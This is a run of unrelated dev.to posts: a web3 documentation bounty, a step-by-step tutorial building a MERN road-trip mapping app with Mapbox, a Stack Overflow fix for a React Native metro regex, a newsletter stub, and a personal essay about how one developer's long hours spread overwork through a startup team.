Virtually all of my knowledge and experience was gained on-the-job, much of it through ad-hoc googling, and it was months before I actually went back and strengthened my knowledge on the fundamentals. And, for an even longer time, concepts like [CORS](https://www.youtube.com/watch?v=4KHiSt0oLJ0), [XSS](https://owasp.org/www-community/attacks/xss/) and [Virtual DOM](https://reactjs.org/docs/faq-internals.html) remained unclear to me.
It's not like I'm at the top of the industry today (still working on it!) but I've definitely gained a lot of experience and knowledge as a web developer, and have created some awesome projects along the way. **And you can too!** don't let anybody deter you from it.
My bottom line is - don't let any random list of technical terms discredit your journey as a developer. *Be proud of what you know*, and be curious in what you don't.
And, perhaps most importantly, be a good person; see people, not their labels, and invest energy in helping them improve instead of discouraging them from doing so. | nitzanhen |
914,378 | 20 ICP(About $800) Bounty for Developer web3 | 20 ICPs, with 10 ICPs bonus for docs site task: @Astrox_Network's "agent_dart" api... | 0 | 2021-12-01T15:39:00 | https://dev.to/utadamaaya/20-icpabout-800-bounty-for-developer-web3-40cf | flutter, dart, blockchain, rust | **20 ICPs, with 10 ICPs bonus for docs site**
task: @Astrox_Network's "agent_dart" api doc
link:https://github.com/AstroxNetwork/agent_dart/issues/13
**Acceptance Criteria:**
[comment on code to cover all apis]
[generate dart docs]
[optional generate gitbook or github pages]
[optional tutorial/docs site for developers]
**Context:**
To have better understanding of internet computer, for client developers, it is the best way to understand how the sdk works.
Though we have ported most agent-js features to agent_dart, we don't have enough resources to complete the api docs. Which is really important work for community developers.
Thus, we need to cover as many apis as possible, we need someone to comment on code like we do for dart code. | utadamaaya |
916,243 | Building a Fullstack Road trip mapper app using the absolute power of MERN stack 🔥 | This article concentrates on the most critical tasks and concepts for better understanding and... | 0 | 2021-12-10T16:30:27 | https://aviyel.com/post/1430/fullstack-road-trip-mapper-app-built-using-mern-stack?utm_source=dev_to&utm_medium=articles_project_tutorials&utm_campaign=post_1430 | react, javascript, mern, webdev | This article concentrates on the most critical tasks and concepts for better understanding and building MERN stack applications from the ground up. It's for folks who are serious about learning about the MERN stack and want to concentrate on the essentials. We'll build a full-stack road trip mapper application where users can pin and map locations and view the sites pinned by other users, all using the MERN stack and leveraging the power of the Mapbox API. This blog session will teach you the fundamentals of MERN stack technology as well as advanced concepts and operations.
***Here's a quick preview of our application's final version:***




There is a separate article where you may learn about the MERN stack in very great detail.
[https://aviyel.com/post/1278](https://aviyel.com/post/1278/crafting-a-stunning-crud-application-with-mern-stack)
***Setting up the folder structure***
Create two folders inside your project directory called client and server, then open them in Visual Studio Code or any other code editor of your choice.


Now, we'll create a MongoDB database, a Node and Express server, a database schema to represent our project case study application, and API routes to create, read, update, and delete data and information from the database using npm and the appropriate packages. So, open a command prompt, navigate to your server's directory, and then run the code below.
```bash
npm init -yes
```
***Configuring package.json file***
Execute the following commands in the terminal to install the dependencies.
```bash
npm install cors dotenv express express-rate-limit mongoose nodemon body-parser helmet morgan rate-limit-mongo
```

- Dotenv: Dotenv is a zero-dependency module that loads environment variables from a .env file into process.env
- cors: This module allows to relax the security applied to an API
- express: Fast, unopinionated, minimalist web framework for node.
- express-rate-limit: Basic IP rate-limiting middleware for Express. It is used to limit repeated requests to public APIs and/or endpoints such as password reset.
- mongoose: It is an Object Data Modeling library for MongoDB and Node. js
- nodemon: This module helps to develop node.js based applications by automatically restarting the application when file changes in the directory are detected.
- body-parser: Node.js body parsing middleware.
- helmet: Helmet.js fills in the gap between Node.js and Express.js by securing HTTP headers that are returned by Express applications.
- morgan : HTTP request logger middleware for node.js
- rate-limit-mongo : MongoDB store for the express-rate-limit middleware.

The "package.json" file should look like this after the dependencies have been installed.

And also, remember to update the scripts as well.

Now go to your server directory, create a src folder, and an index.js file there.
Setting up index.js
- Import express module.
- Import and configure dotenv module
- Import helmet module.
- Import morgan module.
- Import CORS module
- Use express() to initialize our app.
```javascript
//src/index.js
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
// app config
const app = express();
```
We may now utilize all of the other methods on that app instance. Let's start with the fundamentals and very basic setups. Don't forget to set up the port and cors, too.
```javascript
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
const app = express();
const port = process.env.PORT || 4000;
app.use(morgan('common'));
app.use(helmet());
app.use(cors({
origin: process.env.CORS_ORIGIN,
}));
app.use(express.json());
app.get('/', (req, res) => {
res.json({
message: 'Hello There',
});
});
```
Now it's time to connect our server application to a real database. Here we'll use the MongoDB database, specifically the MongoDB cloud Atlas version, which means our database will be hosted on their cloud.
### Setting up MongoDB Atlas cloud cluster
MongoDB is a document-oriented database that is open-source and cross-platform. MongoDB is a NoSQL database that stores data in JSON-like documents and has optional schemas. All versions were given under the AGPL license prior to October 16, 2018. All versions released after October 16, 2018, including bug fixes for prior versions, are covered by the SSPL license v1. You can also learn more about MongoDB setup and configuration from the following article.
[https://aviyel.com/post/1323](https://aviyel.com/post/1323/building-a-calorie-journal-saas-based-project-using-mern-stack)
To set up and start your MongoDB cluster, follow the exact same steps mentioned below.
***Official MongoDB website****

***Sign-up MongoDB***

***Sign-in to MongoDB***

***Create a Project***

***Adding members***

***Building Database***

***Creating a Cluster***

***Selecting a cloud service Provider***

***Configuring Security***

***Database Deployment to the Cloud***

***Navigate to the network access tab and select "Add IP address."***

***Now, select the Choose a connection method.***

***Connecting to cluster***

Create a new variable called DATABASE_CONNECTION inside index.js . Create a string and paste the copied mongo DB connection URL into it. Now, inside it, type your username and password, removing any brackets and entering your own credentials. We'll create environmental variables to safeguard the credential later, but for now, let's add it this way. The second thing we'll need is a PORT, so just type in 4000 for now. Finally, we'll use mongoose to connect to our database, so type in mongoose. connect(), which is a function with two parameters. The DATABASE_CONNECTION will be the first, and the object with two choices will be the second. The first is useNewUrlParser, which we'll enable, and the second is useUnifiedTopology, which we'll enable as well. These objects are optional, but we will see some errors or warnings on our console. Let's chain it with .then() and .catch() inside,then() function. This will simply call the app and invoke listen, leading to two parameters: PORT and the callback function that will be executed if our application is successfully connected to the database. Finally, if the connection to the database is unsuccessful, we will simply console log our error message. Your index.js file should now look something like this.
```javascript
//src/index.js
const express = require('express');
// NOTE morgan is a logger
const morgan = require('morgan');
const helmet = require('helmet');
const cors = require('cors');
const mongoose = require('mongoose');
require('dotenv').config();
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
newUnifiedTopology: true,
});
app.use(morgan('common'));
app.use(helmet());
app.use(cors({
origin: process.env.CORS_ORIGIN,
}));
app.use(express.json());
app.get('/', (req, res) => {
res.json({
message: 'Hello There',
});
});
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
***Insert mongodb+srv into the .env file.***
```
PORT=4000
DATABASE_URL=mongodb+srv://pramit:<password>@cluster0.8tw83.mongodb.net/myFirstDatabase?retryWrites=true&w=majority
CORS_ORIGIN=http://localhost:3000
```
We now have successfully connected our server to the database, let's create middleware first before we get started on building our backend application's routes and database schema. To do so, we'll need to create a new file called middlewares.js and within that file, we will create a two function called notFound and errorHandler
and export those functions. So let create notFound middleware so typically this middleware should be the last middleware that is registered so this middleware takes in req, res, and next. Basically, if a request ever made it here, it means we didn't locate the route users were searching for, so we'll create a variable and send them a message, and then we'll pass that to our next middleware, which is errorHander Middleware but before that don't forget to pass the response status of 404 as well. Now let's make our errorHandler middleware, which has four parameters instead of three, so we'll have (error,req, res, next). The first thing we'll do is set a status code and check whether it's 200 or use the status code that's already been specified, and then we'll simply set the status code, and then we'll respond with some JSON that will display the error message.
```javascript
//middlewares.js
const notFound = (req, res, next) => {
const error = new Error(`Not Found - ${req.originalUrl}`);
res.status(404);
next(error);
};
const errorHandler = (error, req, res, next) => {
const statusCode = res.statusCode === 200 ? 500 : res.statusCode;
res.status(statusCode);
res.json({
message: error.message,
stack: process.env.NODE_ENV === "production" ? "nope" : error.stack,
});
};
module.exports = {
notFound,
errorHandler,
};
```
So, after modifying the middlewares.js file, import and use the middleware as needed in the index.js file.
```javascript
//src/index.js
const express = require("express");
// NOTE morgan is a logger
const morgan = require("morgan");
const helmet = require("helmet");
const cors = require("cors");
const mongoose = require("mongoose");
require("dotenv").config();
const middlewares = require("./middlewares");
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
newUnifiedTopology: true,
});
app.use(morgan("common"));
app.use(helmet());
app.use(
cors({
origin: process.env.CORS_ORIGIN,
})
);
app.use(express.json());
app.get("/", (req, res) => {
res.json({
message: "Hello There",
});
});
app.use(middlewares.notFound);
app.use(middlewares.errorHandler);
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
let's create a LogEntry model. Create a folder called models and inside it, create one file called LogEntry.model.js and within that following file structure your DB schema by defining title, description, comments, image, ratings, latitude and longitude as shown below.
```javascript
//models/LogEntry.model.js
const mongoose = require("mongoose");
const { Schema } = mongoose;
const requiredNumber = {
type: Number,
required: true,
};
const logEntrySchema = new Schema(
{
title: {
type: String,
required: true,
},
description: String,
comments: String,
image: String,
rating: {
type: Number,
min: 0,
max: 10,
default: 0,
},
latitude: {
...requiredNumber,
min: -90,
max: 90,
},
longitude: {
...requiredNumber,
min: -180,
max: 180,
},
visitDate: {
required: true,
type: Date,
},
},
{
timestamps: true,
}
);
const LogEntry = mongoose.model("collections", logEntrySchema);
module.exports = LogEntry;
```
The structure of your files and folders should now look like this.

Now that we've successfully created our DB Schema, let's get started on creating our routes for our backend application. To do so, we'll need to create a new folder inside the src directory and name it as routes Within the routes folder, we will create a js file called logs.routes.js.so first we must import express from "express" and also configure our router and import our recently created DB schema. Now we can begin adding our routes to it.

```javascript
const { Router } = require("express");
const LogEntry = require("../models/LogEntry.model.js");
const { API_KEY } = process.env;
const router = Router();
```
***fetches all the pinned location information.***
```javascript
router.get("/", async (req, res, next) => {
try {
const entries = await LogEntry.find();
res.json(entries);
} catch (error) {
next(error);
}
});
```
***Insert/add a pinned location with authorized access***
```javascript
router.post("/", async (req, res, next) => {
try {
if (req.get("X-API-KEY") !== API_KEY) {
res.status(401);
throw new Error("Unauthorized Access");
}
const logEntry = new LogEntry(req.body);
const createdEntry = await logEntry.save();
res.json(createdEntry);
} catch (error) {
if (error.name === "ValidationError") {
res.status(422);
}
next(error);
}
});
```
***exporting the router***
```javascript
module.exports = router;
```
Your logs.routes.js should resemble something like this
```javascript
//src/routes/logs.routes.js
const { Router } = require("express");
const LogEntry = require("../models/LogEntry.model.js");
const { API_KEY } = process.env;
const router = Router();
router.get("/", async (req, res, next) => {
try {
const entries = await LogEntry.find();
res.json(entries);
} catch (error) {
next(error);
}
});
router.post("/", async (req, res, next) => {
try {
if (req.get("X-API-KEY") !== API_KEY) {
res.status(401);
throw new Error("Unauthorized Access");
}
const logEntry = new LogEntry(req.body);
const createdEntry = await logEntry.save();
res.json(createdEntry);
} catch (error) {
if (error.name === "ValidationError") {
res.status(422);
}
next(error);
}
});
module.exports = router;
```
***Now, update your .env file***
```
NODE_ENV=production
PORT=4000
DATABASE_URL=mongodb+srv://pramit:<password>@cluster0.8tw83.mongodb.net/myFirstDatabase?retryWrites=true&w=majority
CORS_ORIGIN=http://localhost:3000
API_KEY=roadtripmapper
```
Let's get started by importing the logs routes into your index.js file. We can now connect map pinned log info to our application using express middleware. Finally, your root index.js file should be like the following.
```javascript
//src/index.js
const express = require("express");
// NOTE morgan is a logger
const morgan = require("morgan");
const helmet = require("helmet");
const cors = require("cors");
const mongoose = require("mongoose");
require("dotenv").config();
const middlewares = require("./middlewares");
const logs = require("./routes/logs.routes.js");
const app = express();
const DATABASE_CONNECTION = process.env.DATABASE_URL;
mongoose.connect(DATABASE_CONNECTION, {
useNewUrlParser: true,
newUnifiedTopology: true,
});
app.use(morgan("common"));
app.use(helmet());
app.use(
cors({
origin: process.env.CORS_ORIGIN,
})
);
app.use(express.json());
app.get("/", (req, res) => {
res.json({
message: "Hello There",
});
});
app.use("/api/logs", logs);
app.use(middlewares.notFound);
app.use(middlewares.errorHandler);
const port = process.env.PORT || 4000;
app.listen(port, () => {
console.log(`Currently Listening at http://localhost:${port}`);
});
```
After restarting the server, you should see something like this:

---
### Setting up the frontend with react
In the next step let's start with the frontend and build it with react. The first thing you need to do is install Node.js if it isn't already installed on your machine. So, go to the Node.js official website and download the most recent version. You'll require Node js to utilize the node package manager, generally known as NPM. Now navigate to the client folder in your favorite code editor. Visual Studio Code will be my tool of choice. Then, in the integrated terminal, type npx create-react-app. This command will create a client application in the current directory with the name client.

There is a separate article where you may learn everything there is to know about
cleaning up boilerplate react project.
[https://aviyel.com/post/1190](https://aviyel.com/post/1190/building-a-react-application-from-absolute-scratch)
It's time to install some packages within react-boilerplate now that you've installed and cleaned it. so copy and paste the following command into your terminal.
```bash
npm i react-hook-form react-map-gl react-rating-stars-component react-responsive-animate-navbar
```

- react-hook-form: Performant, flexible, and extensible forms library for React Hooks.
- react-map-gl: react-map-gl is a suite of React components designed to provide a React API for Mapbox GL JS-compatible libraries
- react-rating-stars-component: Simple star rating component for your React projects.
- react-responsive-animate-navbar : simple, flexible & completely customizable responsive navigation bar component.

After installing all these packages your packge.json file of the client should look like this:

Let's construct two separate folders /components inside the components folder after we've installed all of our project's dependencies and name it as RoadTripNav and TripEntryForm .
Your file and folder structure should look something like this once you've added all of your components.

Now that you have all of the project's components set up, it's time to start coding. First, import the ReactNavbar from "react-responsive-animate-navbar" and customize the color of your navbar, add the logo to the public folder and import it directly, and don’t forget to add some social links as well. The following is an example of how the code should appear.

```javascript
// components/RoadTripNav
import React from "react";
import * as ReactNavbar from "react-responsive-animate-navbar";
// import roadTripSvg from "../../assets/roadtrip.svg";
const RoadTripNav = () => {
return (
<ReactNavbar.ReactNavbar
color="rgb(25, 25, 25)"
logo="./logo.svg"
menu={[]}
social={[
{
name: "Twitter",
url: "https://twitter.com/pramit_armpit",
icon: ["fab", "twitter"],
},
]}
/>
);
};
export default RoadTripNav;
```
Before we go any further, let's set up our Mapbox. First, go to the Mapbox site and log in or sign up if you don't already have an account. Next, create your own custom map style in the Mapbox Studio and publish it. Finally, go back to the dashboard and copy the default public API key provided by MapBox.

***Login or create your MapBox account***

***Click on design a custom map style***

***Customize your own style of the map inside the Mapbox studio***

***Copy the default public token***

After you've successfully obtained your public token, go to the env file or create one if you don’t have and after that create a variable named as REACT_APP_MAPBOX_TOKEN, then paste that token into that variable. This is what your env file should look like.
```
REACT_APP_MAPBOX_TOKEN= ************************************ // add token
```
Before we go any further, let's make an api and styles folder in our root source directory. Inside the api folder, make a API.js file, and inside the styles folder, make a index.css file where all our styles of the application will be added. This is how your folder structure should appear.

Now go to the newly created API file and construct two functions called "listLogEntries" to collect all the log entries from the backend and "createLogEntries" to create or send the post request / post the entries to the backend, as well as export these functions. Also, don't forget to include the URL where your server is running.

```javascript
//api/API.js
const API_URL = "http://localhost:4000";
// const API_URL = window.location.hostname === "localhost" ? "http://localhost:4000" : "https://road-trip-map-mern.herokuapp.com" ;
export async function listLogEntries() {
const response = await fetch(`${API_URL}/api/logs`);
// const json = await response.json();
return response.json();
}
export async function createLogEntries(entry) {
const api_key = entry.api_key;
delete entry.api_key;
const response = await fetch(`${API_URL}/api/logs`, {
method: "POST",
headers: {
"content-type": "application/json",
"X-API-KEY": api_key,
},
body: JSON.stringify(entry),
});
// const json = await response.json();
// return response.json();
let json;
if (response.headers.get("content-type").includes("text/html")) {
const message = await response.text();
json = {
message,
};
} else {
json = await response.json();
}
if (response.ok) {
return json;
}
const error = new Error(json.message);
error.response = json;
throw error;
}
```
Let's make a submission form for the pinned map location. To do so, open the TripEntryForm component from the component folder we previously made, import the useForm hook from react-hook-form, import createLogentries from api, and then import the useState hook from the React library because this hook will enable us to integrate the state into our functional component. useState(), unlike state in class components, does not work with object values. If necessary, we can use primitives directly and create multiple react hooks for multiple variables. Now, create two states: loading and error, and then destructure register and handleSubmit from the useForm() hook from "react-hook-form" library.After you've completed that, it's time to craft our form, but first let's create a function to handle our submit request. To do so, create an asynchronous onSubmit function and inside it, simply create a try-catch block. Inside the try block set the loading to true, configure the latitude and longitude, console log the data, and invoke the onClose function, and finally inside the catch block, pass the error message to the error state, set the loading to false and simply console log the error message and then simply create a form inside the return statement exactly shown in the code below.

```javascript
// components/TripEntryForm.js
import React, { useState } from "react";
import { useForm } from "react-hook-form";
import { createLogEntries } from "../../api/API";
import "./TripEntryForm.css";
const TripEntryForm = ({ location, onClose }) => {
const [loading, setLoading] = useState(false);
const [error, setError] = useState("");
const { register, handleSubmit } = useForm();
const onSubmit = async (data) => {
try {
setLoading(true);
data.latitude = location.latitude;
data.longitude = location.longitude;
const created = await createLogEntries(data);
console.log(created);
onClose();
} catch (error) {
setError(error.message);
console.error(error);
setLoading(false);
}
};
return (
<form onSubmit={handleSubmit(onSubmit)} className="trip-form">
{error ? <h3 className="error-message">{error}</h3> : null}
<label htmlFor="api_key">Enter Password</label>
<input
type="password"
name="api_key"
placeholder="For demo, password => {roadtripmap} "
required
ref={register}
/>
<label htmlFor="title">Title</label>
<input name="title" placeholder="Title" required ref={register} />
<label htmlFor="comments">Comments</label>
<textarea
name="comments"
placeholder="Comments"
rows={3}
ref={register}
></textarea>
<label htmlFor="description">Description</label>
<textarea
name="description"
placeholder="Describe your journey"
rows={4}
ref={register}
></textarea>
<label htmlFor="image">Image</label>
<input name="image" placeholder="Image URL" ref={register} />
<label htmlFor="rating">Rating (1 - 10)</label>
<input name="rating" type="number" min="0" max="10" ref={register} />
<label htmlFor="visitDate">Visit Date</label>
<input name="visitDate" type="date" required ref={register} />
<button disabled={loading}>
<span>{loading ? "Submitting..." : "Submit your Trip"}</span>
</button>
</form>
);
};
export default TripEntryForm;
```
Also, don't forget to add the TripEntryForm styles inside that very own component folder and name it as TripEntryForm.css and paste the exact CSS code as mentioned below

```css
//TripEntryForm.css
@import url("https://fonts.googleapis.com/css2?family=Fredoka+One&family=Poppins:ital,wght@0,200;0,400;1,200;1,300&family=Roboto:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&display=swap");
.trip-form label {
margin: 0.5rem 0;
display: block;
width: 100%;
color: rgb(255, 255, 255);
font-family: "Fredoka One", cursive;
}
.trip-form input {
margin: 0.5rem 0;
background-color: #2c2e41;
border-radius: 5px;
border: 0;
box-sizing: border-box;
color: rgb(255, 255, 255);
font-size: 12px;
height: 100%;
outline: 0;
padding: 10px 5px 10px 5px;
width: 100%;
font-family: "Fredoka One", cursive;
}
.trip-form textarea {
margin: 0.5rem 0;
background-color: #2c2e41;
border-radius: 5px;
border: 0;
box-sizing: border-box;
color: rgb(255, 255, 255);
font-size: 12px;
height: 100%;
outline: 0;
padding: 10px 5px 10px 5px;
width: 100%;
font-family: "Fredoka One", cursive;
}
.error-message {
color: red;
}
.trip-form button {
background-color: #fb5666;
border-radius: 12px;
border: 0;
box-sizing: border-box;
color: #eee;
cursor: pointer;
font-size: 18px;
height: 50px;
margin-top: 38px;
outline: 0;
text-align: center;
width: 100%;
}
button span {
position: relative;
z-index: 2;
}
button:after {
position: absolute;
content: "";
top: 0;
left: 0;
width: 0;
height: 100%;
transition: all 2.35s;
}
button:hover {
color: #fff;
}
button:hover:after {
width: 100%;
}
.small_description {
font-size: 60px;
}
```
Now go to this repo and download all of the SVG files that are available there.
[https://github.com/pramit-marattha/road-trip-mapper-mern-app/tree/main/client/src/assets](https://github.com/pramit-marattha/road-trip-mapper-mern-app/tree/main/client/src/assets)
After you've downloaded all of the svg files, go to the main app component, and begin importing all of the key requirements from the libraries we previously installed, such as ReactMapGl, marker, and popup from the "react-map-gl" library, import all of the components as well as svgs from the assets folder, and finally create four state logEntries whose initial value is empty array, showPopup whose initial value is an empty object, addEntryLocation has a default value of null, and for viewport specify the initial value exactly like the code mentioned below or you can add whatever you want. Create an asynchronous function called getEntries that asynchronously calls the listLogEntries function that was previously established within the api file and whose main task is to retrieve all of the entries made by the users and feed them to the logEntries state and then call that function inside the useEffect() hook by using this Hook, you tell React that your component needs to do something after render.
React will remember the function you passed (we’ll refer to it as our “effect”), and call it later after performing the DOM updates. To this effect, we set the document title, but we could also perform data fetching or call some other imperative API. Placing useEffect() inside the component lets us access the count state variable (or any props) right from the effect. We don’t need a special API to read it — it’s already in the function scope. Hooks embrace JavaScript closures and avoid introducing React-specific APIs where JavaScript already provides a solution.useEffect() the hook is somewhat similar to the life-cycle methods that we are aware of for class components. It runs after every render of the component including the initial render. Hence it can be thought of as a combination of componentDidMount, componentDidUpdate, and componentWillUnmount.If we want to control the behavior of when the effect should run (only on initial render, or only when a particular state variable changes), we can pass in dependencies to the effect to do so. This hook also provides a clean-up option to allow cleaning up of resources before the component is destroyed. basic syntax of the effect: useEffect(didUpdate) .
Create a function named showMarkerPopup and provide the event parameters to it. Inside that function, destruct the latitude and longitude from "event.lngltd" and pass it to addEntryLocation state. Finally, employ all of the imported components within our return statement by simply following the code shown below.

```javascript
//src/app.js
import * as React from "react";
import { useState, useEffect } from "react";
import ReactMapGL, { Marker, Popup } from "react-map-gl";
import { listLogEntries } from "./api/API";
import MapPinLogo from "./assets/mapperPin.svg";
import MarkerPopup from "./assets/MarkerPopup.svg";
import TripEntryForm from "./components/TripEntryForm";
import ReactStars from "react-rating-stars-component";
import RoadTripNav from "./components/RoadTripNav/RoadTripNav";
const App = () => {
const [logEntries, setLogEntries] = useState([]);
const [showPopup, setShowPopup] = useState({});
const [addEntryLocation, setAddEntryLocation] = useState(null);
const [viewport, setViewport] = useState({
width: "100vw",
height: "100vh",
latitude: 27.7577,
longitude: 85.3231324,
zoom: 7,
});
const getEntries = async () => {
const logEntries = await listLogEntries();
setLogEntries(logEntries);
console.log(logEntries);
};
useEffect(() => {
getEntries();
}, []);
const showMarkerPopup = (event) => {
console.log(event.lngLat);
const [longitude, latitude] = event.lngLat;
setAddEntryLocation({
longitude,
latitude,
});
};
return (
<>
<RoadTripNav />
<ReactMapGL
{...viewport}
mapStyle="mapbox://styles/pramitmarattha/ckiovge5k3e7x17tcmydc42s3"
mapboxApiAccessToken={process.env.REACT_APP_MAPBOX_TOKEN}
onViewportChange={(nextViewport) => setViewport(nextViewport)}
onDblClick={showMarkerPopup}
>
{logEntries.map((entry) => (
<React.Fragment key={entry._id}>
<Marker latitude={entry.latitude} longitude={entry.longitude}>
<div
onClick={() =>
setShowPopup({
// ...showPopup,
[entry._id]: true,
})
}
>
<img
className="map-pin"
style={{
width: `${5 * viewport.zoom}px`,
height: `${5 * viewport.zoom}px`,
}}
src={MapPinLogo}
alt="Map Pin Logo"
/>
</div>
</Marker>
{showPopup[entry._id] ? (
<Popup
latitude={entry.latitude}
longitude={entry.longitude}
closeButton={true}
closeOnClick={false}
dynamicPosition={true}
onClose={() => setShowPopup({})}
anchor="top"
>
<div className="popup">
<ReactStars
count={10}
value={entry.rating}
size={29}
activeColor="#ffd700"
/>
<div className="popup_image">
{entry.image && <img src={entry.image} alt={entry.title} />}
</div>
<h3>{entry.title}</h3>
<p>{entry.comments}</p>
<small>
Visited :{" "}
{new Date(entry.visitDate).toLocaleDateString("en-US", {
weekday: "long",
year: "numeric",
month: "long",
day: "numeric",
})}
</small>
<p>Ratings: {entry.rating}</p>
<div className="small_description">{entry.description}</div>
</div>
</Popup>
) : null}
</React.Fragment>
))}
{addEntryLocation ? (
<>
<Marker
latitude={addEntryLocation.latitude}
longitude={addEntryLocation.longitude}
>
<div>
<img
className="map-pin"
style={{
width: `${8 * viewport.zoom}px`,
height: `${8 * viewport.zoom}px`,
}}
src={MarkerPopup}
alt="Map Pin Logo"
/>
</div>
{/* <div style={{color:"white"}}>{entry.title}</div> */}
</Marker>
<Popup
latitude={addEntryLocation.latitude}
longitude={addEntryLocation.longitude}
closeButton={true}
closeOnClick={false}
dynamicPosition={true}
onClose={() => setAddEntryLocation(null)}
anchor="top"
>
<div className="popup">
<TripEntryForm
onClose={() => {
setAddEntryLocation(null);
getEntries();
}}
location={addEntryLocation}
/>
</div>
</Popup>
</>
) : null}
</ReactMapGL>
</>
);
};
export default App;
```
The very final step is to add all of the styles to our project, which can be done by going to our previously established styles folder and copying and pasting the following mentioned code into the index.css file.

```css
/* styles/index.css */
@import url("https://fonts.googleapis.com/css2?family=Fredoka+One&family=Poppins:ital,wght@0,200;0,400;1,200;1,300&family=Roboto:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&display=swap");
body {
margin: 0;
font-family: "Fredoka One", cursive;
height: 100vh;
width: 100vw;
overflow: hidden;
}
code {
font-family: source-code-pro, Menlo, Monaco, Consolas, "Courier New",
monospace;
}
.map-pin {
position: absolute;
transform: translate(-50%, -100%);
z-index: -1;
}
.popup {
width: 20vw;
height: auto;
padding: 1rem;
background-color: #8661d1;
border-radius: 5px;
z-index: 999;
}
.popup img {
width: 40%;
height: auto;
border-radius: 5%;
justify-content: center;
align-items: center;
margin: 0 auto;
padding-top: 1rem;
}
.popup_image {
display: flex;
justify-content: center;
align-items: center;
}
.small_description {
font-size: 1.5rem;
color: #fff;
border-radius: 5px;
z-index: 999;
}
button {
border: none;
color: #fa5252;
padding-right: 1rem;
border-radius: 50%;
font-size: 4rem;
margin-top: 0.2rem;
height: auto;
cursor: pointer;
}
```
Finally, start both the client and the server.

## Application up and running

This application's entire source code is available here.
[https://github.com/aviyeldevrel/devrel-tutorial-projects/tree/main/MERN-roadtrip-mapper](https://github.com/aviyeldevrel/devrel-tutorial-projects/tree/main/MERN-roadtrip-mapper)
Main article available here => [https://aviyel.com/post/1430](https://aviyel.com/post/1430/fullstack-road-trip-mapper-app-built-using-mern-stack?utm_source=dev_to&utm_medium=articles_project_tutorials&utm_campaign=post_1430)
Happy Coding!!
Follow [@aviyelHQ](https://twitter.com/AviyelHq) or [sign-up](https://aviyel.com/discussions) on Aviyel for early access if you are a project maintainer, contributor, or just an Open Source enthusiast.
Join Aviyel's Discord => [Aviyel's world](https://discord.gg/TbfZmbvnN5)
Twitter =>[https://twitter.com/AviyelHq]
| pramit_marattha |
926,055 | Answer: How to resolve the error on 'react-native start' | answer re: How to resolve the error on... | 0 | 2021-12-14T11:46:26 | https://dev.to/bilalmohib/answer-how-to-resolve-the-error-on-react-native-start-1iga | javascript, mobile, programming, node | {% stackoverflow 58122821 %}
I just got a similar error for the first time today. It appears in \node_modules\metro-config\src\defaults\blacklist.js, there is an invalid regular expression that needed changed. I changed the first expression under sharedBlacklist from:
```js
var sharedBlacklist = [
/node_modules[/\\]react[/\\]dist[/\\].*/,
/website\/node_modules\/.*/,
/heapCapture\/bundle\.js/,
/.*\/__tests__\/.*/
];
```
to:
```js
var sharedBlacklist = [ /node_modules[\/\\]react[\/\\]dist[\/\\].*/,
/website\/node_modules\/.*/,
/heapCapture\/bundle\.js/,
/.*\/__tests__\/.*/
];
```
Copied from https://stackoverflow.com/a/58122821/13161180
Credit goes to Clem | bilalmohib |
937,264 | The Weekly Dev - 202152 | "The Weekly Dev" cares about technical solutions (namely: software) that are hackable and enable a... | 0 | 2021-12-27T07:35:46 | https://kevwe.com/weekly/202152 | ---
title: The Weekly Dev - 202152
published: true
description:
tags:
//cover_image: https://direct_url_to_image.jpg
canonical_url: 'https://kevwe.com/weekly/202152'
---
"The Weekly Dev" cares about technical solutions (namely: software) that are hackable and enable a deeper level of understanding.
We don't want to either 'be used' by our software, nor from software (cloud?) companies. We want to be on top of it, be able to interact and mess with the code.
The resources that have caught our attention at this time:
https://kevwe.com/weekly/202152
| madunixman | |
937,756 | How I made workplace toxic | Photo by Kyle Nieber on Unsplash It's been six years since I left my job at a startup where I worked... | 0 | 2021-12-27T17:55:33 | https://dev.to/this-is-learning/how-i-made-workplace-toxic-1ici | career, workplace, toxic | Photo by <a href="https://unsplash.com/@kylenieber?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Kyle Nieber</a> on <a href="https://unsplash.com/?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText">Unsplash</a>
It's been six years since I left my job at a startup where I worked for around five years. I have a lot of good memories, bad ones too. But I think about this one thing a lot, how I made that workplace toxic. It was unintentional. So here is the story, and I hope you don't make the same mistake.
## Initial Days
After I completed college, I had one thing clear in my mind. I would never work for more than 8hrs. I even left my first job, because my CEO made me work till 10 pm one day, it was one day in 8 months I worked there, somehow he believed if you want to grow, you need to work 10+ hrs daily (Which is false). Even in my 2nd job, I let my manager know that don't expect me to work for more than 8hrs when he asked me why bugs were still not resolved in one day (yeah, that was his expectation).
#The Story
Now let's get back to what I did, which I think was wrong and made the workplace more toxic.
In my initial three years in my career, I hardly had worked at the organizations I worked for four organizations, and by Aug 2011, I joined my 5th organization. I wanted some work, wanted to learn and grow. And before you ask, no, I had no idea about Open Source and was not in the condition to afford a computer for myself.
## How it started
The business was related to fintech, and it was a 3-year-old startup and had too many exciting problems to solve.
Suddenly, I could see I had some interesting problems to solve, and no one took responsibility. There was only one problem though time.
So the next thing which I did was I started putting in more hours, I began working 10+hours, no one asked me to do that, I was selfish, I wanted to grow. I wanted to grow faster. I tried to cover the last three years I had lost not learning new things.
Suddenly the things paid off, in the wrong way. Within a year, I had the opportunity to lead our Production support team. It was a 6-7 people team. I am proud of the work we did together.
Even after having the team, I kept working those extra hours. Still, no one asked me to do that, and I never asked my team to stay longer in the office.
But they had a bad influence on them, and it was me; yes, this is where everything went wrong. Suddenly, my team started working more hours, and on many occasions, we even worked for days.
Working more hours suddenly became a thing; no one asked for it; I started it, and now I think it became Business As Usual for the organization. My team size increased from 7 to 32 in the next three years, and I was still doing it, making the workplace more toxic.
## What's the worst I did
